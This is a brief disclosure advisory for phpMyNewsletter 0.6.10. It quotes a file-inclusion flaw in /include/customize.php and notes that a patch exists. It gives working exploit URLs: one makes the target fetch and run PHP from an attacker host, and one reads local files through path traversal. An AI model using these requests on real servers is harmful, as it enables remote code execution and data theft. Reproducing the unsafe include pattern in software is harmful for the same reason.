Product : phpMyNewsletter
Tested version : 0.6.10
Website : http://gregory.kokanosky.free.fr/phpmynewsletter/
Problem : include file
PHP code :
°°°°°°°°°°
---- /include/customize.php ----
<?
$langfile = $l;
include $l;
?>
---- /include/customize.php ----
Exploit :
°°°°°°°°°
http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With in http://[attacker]/code.txt :
<? echo $text; ?>
or
http://[target]/include/customize.php?l=…/path/file/to/view
Patch :
°°°°°°°
Autor has been alerted and last version (0.7beta1) has been patched.
More details
frog-m@n